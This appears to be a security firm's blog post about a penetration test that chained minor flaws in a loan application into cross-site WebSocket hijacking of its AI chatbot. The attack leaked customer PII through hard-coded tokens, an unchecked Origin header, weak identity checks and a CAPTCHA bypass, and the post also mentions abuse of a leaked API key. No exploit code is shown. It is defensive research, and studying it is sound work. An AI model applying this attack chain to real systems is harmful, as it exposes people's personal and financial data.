Ignoring the little stuff is never a good idea. Anyone who has pretended that the small noise their car engine is making is unimportant, only to later find themselves stuck on the side of the road with a dead motor will understand this statement.
The same holds true when it comes to dealing with minor vulnerabilities in a web application. Several small issues that alone do not amount to much, can in fact prove dangerous, if not fatal, when strung together by a threat actor. And much like the driver who did not want to admit that his car was having problems, it can be difficult to explain to a client that action is needed to correct a situation before it becomes a major headache.
So, today we are going to show how Trustwave SpiderLabs penetration testers go about connecting the dots in a manner that can be explained to a client using several vulnerabilities discovered that if exploited, would have led to highly valuable customer data being exposed.
Hiding in Plain Sight
SpiderLabs was in the process of researching a loan lending application developed by a major IT solutions company that came with two generic mailinator accounts. The client informed us that the application was under development and currently broken. After several days of testing, we did not find any standout issues, only some low severity problems. This was partly due to the scope, restrictions, and insufficient privileges provided to us by the client and overall, having to work with a broken application.
However, while conducting additional pre-authentication tests, SpiderLabs observed a small chat box hidden in the corner of the application. It was hard to spot as it was same color as the website and so not easily visible.
What we found was a chatbot. To our surprise, it was possible using the chatbot to interact in depth with the client’s loan lending system. The chatbot did not ask for any credentials to login into the application.
Instead, the chatbot’s Artificial Intelligence (AI) allowed users to simply identify themselves by first name, last four digits of their Social Security Number (SSN), and a zip code.
Does anyone think these parameters were strong enough for validation?
Much to our surprise, further investigation revealed that the chatbot was hosted on a domain outside the scope of the test! In fact, the chatbot was also communicating with another domain that was not in scope.
SpiderLabs immediately zeroed in on the application’s dodgy and very vulnerable design. Our next step was to speak with the client. At this point, SpiderLabs was well beyond the test’s initial scope, so we told the client that we would stop here and go no further.
Digging Deeper into the Problem
As we continued our research, we observed that the chatbot would repeat the text, or whatever was typed in, and would provide options for alternate data to validate the user input against the loan lending system.
This happened because the chat system was designed to be too verbose and powerful to interact with the loan lending application without having to log into the application. This created the problem of excessive features or authority provided to the chatbot which was exploited by SpiderLabs. Oddly, the fact that this was a very helpful AI made it easier for us to exploit the chatbot by trial and error.
Following is a snapshot of it –
Figure 1. Loan Lending Chatbot Application.
We soon observed that the chatbot was communicating over WebSocket and the WebSocket stream was established even before typing anything into the chatbot, as shown below! (Here is the catch!)
Figure 2. Chatbot WebSocket stream
Why is this a problem? If the WebSocket stream is generated before starting the chat, that means the stream is already ready and the attacker just needs to capture the wss:// scheme highlighted in red as shown above. Exactly how and all dependencies related to it are explained later in the blog.
The Origin header for the WebSocket handshake was not validated, but it did have a unique token. Now, how do we get the tokens or generate the above highlighted stream if we want to hijack the chatbot conversation? We left it there for few hours and poked in other areas of the application to identify items like Arbitrary File Upload, Weak Input Validation, Sensitive Data in URL, Email Enumeration and interestingly, SSN Enumeration.
Digging into the business logic, the customer gifted us a finding as there were some changes going on in the development environment that essentially created the problem as this issue was not there before the client started making the changes. A loan application was submitted using the user account <user1>@mailinator.com and mapped to a user. The profile was later changed by the backend application team, and SpiderLabs was not provided any standard user or admin privileges to do the change ourselves.
We noticed this new profile could access loan contract statements generated by the previously mapped user. This resulted in multiple application route instances being affected by this business logic flaw, allowing steps to be skipped and unauthorized changes being made to loan applications and contract statements.
So now, let’s come back to the WebSocket handshake which looked vulnerable at first sight. This design flaw could have been avoided if the token and stream generation with CSRF protection and whitelisted Origin header had been generated after, and not before, opening the chat session. Here it appeared that there was no separate session to differentiate the events happening before and after the validation input provided by the user to the chatbot.
Our analysis said that once the attacker hijacks the wss:// scheme, he/she would have a one-hour window and could silently keep waiting until the chatbot or any customer who uses that stream during this period starts texting, which would then automatically flow to the attacker controller client.
We attempted to get a Cross-Site WebSocket Hijacking (CSWSH) executed. This is nothing but a Cross-Site Request Forgery (CSRF) vulnerability on a WebSocket handshake and arises when the WebSocket handshake relies on cookies for handling the session and does not have an anti-CSRF token. But in this case, we had an invalidated Origin header, multiple tokens, and it wasn’t even cookie based as an authorization header was used. So, is it a dead end for us? No, in fact it opened a few doors.
SpiderLabs stumbled upon an authentication bug. Personally Identifiable Information (PII), application routes, multiple APIs and their keys, Secure Keys, templates, email, username, tenant details, loan transaction parameters, etc. were all available without authentication. Sensitive Information (SI) exposed in the server response and the authentication bug coupled along making it easier to hijack the WebSocket!
Analysing the application workflow, this is how the WebSocket stream was generated:
Step 1: The WebSocket token generation service was hard coded in the client-side HTML source code of the chatbot as shown below:
Figure 3. Hard-Coded Token in Source Code
The above token was used to generate the next POST body token as shown below:
Figure 4. POST Body Token Generated using the Hard-Coded Token in Step 1
The token generated from the POST body in step 2 became the Authorization Bearer token in this step, finally providing the web socket stream.
Figure 5. WebSocket Stream Generation using Token from Step 2 sent as a request
Figure 6. WebSocket Stream Generation response from the request in Figure 5
So, connecting all the dots confirmed that we could indeed hijack the chatbot conversation! A simple script could be written to scrape and collect the hard-coded tokens and issue the above-mentioned interim requests to generate the web socket stream, but we wanted to highlight the design flaw to the client, hence the step-by-step approach as shown above.
Some vulnerabilities are detected using out-of-band security testing where an application can be induced to retrieve content using an external system causing DNS/HTTP/SMTP interactions, thus leaking out sensitive data. Therefore, we used the following setup to perform the test (image taken from portswigger.net):
Figure 7. Out of Band (OOB) Test Setup
The CSWSH attack script was created as shown below:
Figure 8. CSWSH Proof of Concept
As a result of the successful CSWSH attack, evidence showed that sensitive PII (masked) was sent from the target to the attacker-controlled collaborator client.
Figure 9. Attacker-Controlled Burp Collaborator Client
Note the magic here: CSRF would need an authenticated session. Here, the web socket stream was already generated with all tokens even before the user started communicating with the chatbot. This happens when you load the webpage (without entering any credentials) and the chatbot web stream also starts quietly in the background. So, when the victim is interacting with the chatbot, he/she/they provide only four digits of their SSN (the rest can be replaced with *), a property zip code (which you can Google and build up a list for brute-force attacks), and only the first name which can be easily populated. To make it even easier, the client previously provided some sample dummy data.
After the victim provides the validation (which the chatbot helpfully offers a hint for if it is wrong!), the token is live for an hour and there is this one-hour window which an attacker can use to exploit the vulnerability.
The attacker would create a malicious page on the domain it controls, which would then establish a cross-site WebSocket connection to the vulnerable chatbot. The chatbot will handle the connection in the context of the victim user's session. Now, the attacker's page can send arbitrary messages to the server as well as read the contents of the messages that are received from the server.
So, unlike the standard CSRF vulnerability, the attacker here would create a two-way interaction with the compromised chatbot application. In our case, we just created the socket connection and waited! The customer and the AI, which foolishly repeated PII of the customer in all conversations, started automatically flowing to our collaborator client!
However, the story does not end here.
An interesting observation was that the chatbot communicated with two WebSocket on different domains. The second WebSocket was used for cognitive speech services, which means the chatbot could listen and talk to us! SpiderLabs observed that whatever was said, was uploaded to the second WebSocket domain as an audio stream, then forwarded to the first WebSocket domain and converted to “type” attribute. Therefore, we see the message in the chatbot. Essentially it was a talk to text function.
By the way, even the second WebSocket was vulnerable. We started dreaming of conducting code execution just by talking to the socket, but at that point something hilarious happened. While we were testing the chatbot, our private conversation was captured by the chatbot's audio speech service. This resulted in the chatbot, shamelessly intruding into our conversation and asking, “Sorry, can you repeat that again?” This example truly shows the extent to which AI could be used to not only compromise systems but even victimize personal lives too!
If you would like to learn more about these attacks, portswigger.net has a very good tutorial.
At this point in time, due to HTTP and DNS lookups having been received at our Collaborator end, we should have shifted focus to Server-Side Request Forgery (SSRF), but as external domains were not in the client’s control, we had to draw a line and stop there. As such, we already reached a point where we had a proof of concept sufficient to prove the hijack.
Further, this application had more juice where Google Map API Key was retrieved and was used as a sample to show billing over consumption. Open-Source Intelligence (OSINT) research on the web led to the following reference table of costs to be beared per individual API exploit:
Figure 10. Cost Table/Reference to Exploit
SpiderLabs performed a limited scope attack using the tool ‘gmapsapiscanner’ (https://github.com/ozguralp/gmapsapiscanner) as shown below:
Figure 11. Google Map API Scanning for Vulnerable Endpoints
The CAPTCHA validation system was also bypassed by changing a simple “Disable” attribute on the client side. So, we already enjoyed a brute-force window!
With a lot of satisfaction from the low severity findings to the critical bugs, the report ended up looking like this:
Figure 14. Report Vulnerabilities Summary
The moral of the story is to put a lot of emphasis on the enumeration, connect the dots, and chain the individual vulnerabilities wherever possible so that the actual impact of the risk can be demonstrated to customers.